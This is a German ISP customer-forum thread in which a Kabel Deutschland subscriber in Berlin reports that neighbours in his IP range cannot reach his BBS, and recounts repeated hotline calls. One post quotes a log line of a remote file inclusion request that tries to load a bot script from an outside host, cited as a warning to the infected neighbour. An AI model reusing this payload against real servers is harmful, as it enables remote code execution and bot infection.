internes Routing bei KDG gestört?!
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Bitte gib bei der Erstellung eines Threads im Feld „Präfix“ an, ob du Kunde von Vodafone Kabel Deutschland („[VFKD]“), von Vodafone West („[VF West]“), von eazy („[eazy]“) oder von O2 über Kabel („[O2]“) bist.
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internes Routing bei KDG gestört?!
Hi!
Seit dem letzten großen Ausfall bei KDG gibt es in meinem Bereich (Berlin Hohenschönhausen/Weissensee) ein sehr seltsames Problem.
Das äußert sich darin, das so ziemlich niemand mit der IP-Adresse 88.134.*.* meinen Rechner (88.134.17.229) erreichen kann. Diese Leute können im großen Netz surfen wohin sie wollen, ohne Probleme, nur wenn sie meinen Rechner anwählen, gibt's 'nen Timout. Hierbei ist es egal, ob sie die IP direkt eingeben oder den Namen (dungeon-bbs.homeip.net).
Ein "tracerte -d dungeon-bbs.homeip.net" löst den Namen korrekt auf, verläuft aber nach 5 oder 6 Rechnern im Sande. Die Hotline ist völlig ratlos und die Betroffenen ziemlich sauer.
Was geht da vor?
Bye/2
Seit dem letzten großen Ausfall bei KDG gibt es in meinem Bereich (Berlin Hohenschönhausen/Weissensee) ein sehr seltsames Problem.
Das äußert sich darin, das so ziemlich niemand mit der IP-Adresse 88.134.*.* meinen Rechner (88.134.17.229) erreichen kann. Diese Leute können im großen Netz surfen wohin sie wollen, ohne Probleme, nur wenn sie meinen Rechner anwählen, gibt's 'nen Timout. Hierbei ist es egal, ob sie die IP direkt eingeben oder den Namen (dungeon-bbs.homeip.net).
Ein "tracerte -d dungeon-bbs.homeip.net" löst den Namen korrekt auf, verläuft aber nach 5 oder 6 Rechnern im Sande. Die Hotline ist völlig ratlos und die Betroffenen ziemlich sauer.
Was geht da vor?
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Re: internes Routing bei KDG gestört?!
'n Abend!
KDG hat mir gerade am Telefon mitgeteilt, das sie den Fehler gefunden haben und dieser wohl auch etwas Größer ist. Vor kommende Weihnachten werden die Techniker es scheinbar aber nicht mehr schaffen ihn zu beheben.
Nunja, ich werde die Tage zählen...
Bye/2
KDG hat mir gerade am Telefon mitgeteilt, das sie den Fehler gefunden haben und dieser wohl auch etwas Größer ist. Vor kommende Weihnachten werden die Techniker es scheinbar aber nicht mehr schaffen ihn zu beheben.
Nunja, ich werde die Tage zählen...
Bye/2
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Hi!
Bisher hat sich bei der Lösung dieses Problems leider noch nichts getan.
Dafür schlagen momentan immer wieder Anfragen dieser Art bei mir ein:
Das ist zwar nicht wirklich tragisch, aber das diese Anfragen aus dem Adressebereich kommen, welcher mich eigentlich nicht erreicht, das ist schon seltsam. Verursacher ist in diesem Fall ein Rechner mit der IP 88.134.3.154.
Also Berliner aus dem Bereich Hohenschönhausen und Weißensee, überprüft eure IP Adresse. Sollte zufällig jemand diese IP haben, dann möge er seine Kiste überprüfen und den Expoit darauf entfernen.
Bye/2
Bisher hat sich bei der Lösung dieses Problems leider noch nichts getan.
Dafür schlagen momentan immer wieder Anfragen dieser Art bei mir ein:
Code: Alles auswählen
"GET /lib/activeutil.php?set[include_path]=http://w32-gen.us/bot.php? HTTP/1.0" 404 - "" "null was here."
Also Berliner aus dem Bereich Hohenschönhausen und Weißensee, überprüft eure IP Adresse. Sollte zufällig jemand diese IP haben, dann möge er seine Kiste überprüfen und den Expoit darauf entfernen.
Bye/2
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Hi!
Da sich bisher immer noch nichts bei KDG getan hat, habe ich eben nochmals beim Störungsdienst nachgefragt. Das Ergebnis ist ernüchternd um nicht zu sagen mehr als enttäuschend. Lt. dem Herrn bei KDG (Störungsdienst) wurde bei meinem ersten Anruf nicht mal ein entsprechendes Ticket erstellt, bzw. er fand überhaupt keine entsprechende Störungsmeldung. Das würde auch das rumdrucksen der Frau bei meinem gestrigen Anruf erklären.
Da frage ich mich, wieso mich dann 2x eine (vermutl.) Technikerin zurückrief um mir mitzuteilen, das das Problem gefunden wurde. Weiss da die Hand nicht was die Andere tut, oder werden da Störungsmeldungen gekickt, oder was soll das?
Jedenfalls wurde mir beim Anruf eben wieder versprochen sich darum zu kümmern. Nur mir fehlt der Glaube daran. Es wird wohl wieder auf einen "Nervenkrieg" (wie LC 1511 verliert die Verbindung) zwischen Hotline und mir herauslaufen, so wie ich ihn schon einmal vor gut einem Jahr auskämpfen musste. Damals war auch eine Fehlkonfiguration bei KDG schuld und die Störungsstelle wimmelte mich immer wieder ab.
Bye/2
Da sich bisher immer noch nichts bei KDG getan hat, habe ich eben nochmals beim Störungsdienst nachgefragt. Das Ergebnis ist ernüchternd um nicht zu sagen mehr als enttäuschend. Lt. dem Herrn bei KDG (Störungsdienst) wurde bei meinem ersten Anruf nicht mal ein entsprechendes Ticket erstellt, bzw. er fand überhaupt keine entsprechende Störungsmeldung. Das würde auch das rumdrucksen der Frau bei meinem gestrigen Anruf erklären.
Da frage ich mich, wieso mich dann 2x eine (vermutl.) Technikerin zurückrief um mir mitzuteilen, das das Problem gefunden wurde. Weiss da die Hand nicht was die Andere tut, oder werden da Störungsmeldungen gekickt, oder was soll das?
Jedenfalls wurde mir beim Anruf eben wieder versprochen sich darum zu kümmern. Nur mir fehlt der Glaube daran. Es wird wohl wieder auf einen "Nervenkrieg" (wie LC 1511 verliert die Verbindung) zwischen Hotline und mir herauslaufen, so wie ich ihn schon einmal vor gut einem Jahr auskämpfen musste. Damals war auch eine Fehlkonfiguration bei KDG schuld und die Störungsstelle wimmelte mich immer wieder ab.
Bye/2
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Moin,
vielleicht wurde das Ticket auch einfach nur gekillt, da es ja abgearbeitet ist. Dann kann es u.U. eben nicht mehr zu sehen sein - was nicht heißt, das es keines gegeben hat. Aus langer Weile ruft ja keiner bei dir an...
Wenn die Störung weiterhin/ erneut besteht, hilft eben nur ein neues Ticket.
Gruß
vielleicht wurde das Ticket auch einfach nur gekillt, da es ja abgearbeitet ist. Dann kann es u.U. eben nicht mehr zu sehen sein - was nicht heißt, das es keines gegeben hat. Aus langer Weile ruft ja keiner bei dir an...
Wenn die Störung weiterhin/ erneut besteht, hilft eben nur ein neues Ticket.
Gruß
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Hi!
Gerade eben habe ich wieder mit KDG telefoniert und nachgefragt was aus der Störungsmeldung geworden ist. Immerhin ist diese noch vorhanden, während die Meldung vom 29.12.2006 tatsächlich verschwunden scheint. Zumindest fand auch diesmal der Herr von KDG keinen entsprechenden Eintrag.
Ansonsten wurde die Meldung an die Techniker weitergeleitet und soll in Bearbeitung sein. Ich will es jedenfalls hoffen, denn spätestens nächsten Donnerstag nerve ich dort wieder.
Bye/2
Das währe eine sehr seltsame Logik, welche mir bei noch keiner anderen Firma untergekommen ist.meinereiner hat geschrieben:vielleicht wurde das Ticket auch einfach nur gekillt, da es ja abgearbeitet ist. Dann kann es u.U. eben nicht mehr zu sehen sein - was nicht heißt, das es keines gegeben hat. Aus langer Weile ruft ja keiner bei dir an...
Gerade eben habe ich wieder mit KDG telefoniert und nachgefragt was aus der Störungsmeldung geworden ist. Immerhin ist diese noch vorhanden, während die Meldung vom 29.12.2006 tatsächlich verschwunden scheint. Zumindest fand auch diesmal der Herr von KDG keinen entsprechenden Eintrag.
Ansonsten wurde die Meldung an die Techniker weitergeleitet und soll in Bearbeitung sein. Ich will es jedenfalls hoffen, denn spätestens nächsten Donnerstag nerve ich dort wieder.
Bye/2
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Moin,
tja, warum die weg ist, wird dir keiner sagen können...man findet sie, oder eben nicht. Wie ich schrieb, so könnte ich es mir erklären. Dich rief jemand an, also war sie nicht im schwarzen Loch verloren gegangen.
Leider dauert die Bearbeitung meist rel. lang. Der Support nimmt es eben nur auf und bearbeiten tun es andere.
Das ist wirklich echt ein Punkt, wo man was verbessern kann - schnellere Abarbeitung der Tickets....
Schreib uns mal den Fortgang der "Geschichte"...
Gruß
tja, warum die weg ist, wird dir keiner sagen können...man findet sie, oder eben nicht. Wie ich schrieb, so könnte ich es mir erklären. Dich rief jemand an, also war sie nicht im schwarzen Loch verloren gegangen.
Leider dauert die Bearbeitung meist rel. lang. Der Support nimmt es eben nur auf und bearbeiten tun es andere.
Das ist wirklich echt ein Punkt, wo man was verbessern kann - schnellere Abarbeitung der Tickets....
Schreib uns mal den Fortgang der "Geschichte"...
Gruß
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Was ja auch o.k. ist.meinereiner hat geschrieben:Leider dauert die Bearbeitung meist rel. lang. Der Support nimmt es eben nur auf und bearbeiten tun es andere.
Jupp.Das ist wirklich echt ein Punkt, wo man was verbessern kann - schnellere Abarbeitung der Tickets....
Auf jeden Fall.Schreib uns mal den Fortgang der "Geschichte"...
Bye/2
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Hi!
So, gerade eben ein Gespräch mit KDG wutentbrannt beendet. Der Herr vom Störungsdienst verwies mich doch glattweg an eine 0900er Nr. weil angeblich die Techniker bei KDG das Problem nicht nachvollziehen können. Sinngemäß steht in der Bearbeitung der Störungsmeldung drinn, das bei erneutem Anruf (durch mich) an die 0900 zu verweisen ist.
Jetzt nerve ich diese Firma solange bis mich ein Techniker zurückruft.
Bye/2
So, gerade eben ein Gespräch mit KDG wutentbrannt beendet. Der Herr vom Störungsdienst verwies mich doch glattweg an eine 0900er Nr. weil angeblich die Techniker bei KDG das Problem nicht nachvollziehen können. Sinngemäß steht in der Bearbeitung der Störungsmeldung drinn, das bei erneutem Anruf (durch mich) an die 0900 zu verweisen ist.
Jetzt nerve ich diese Firma solange bis mich ein Techniker zurückruft.
Bye/2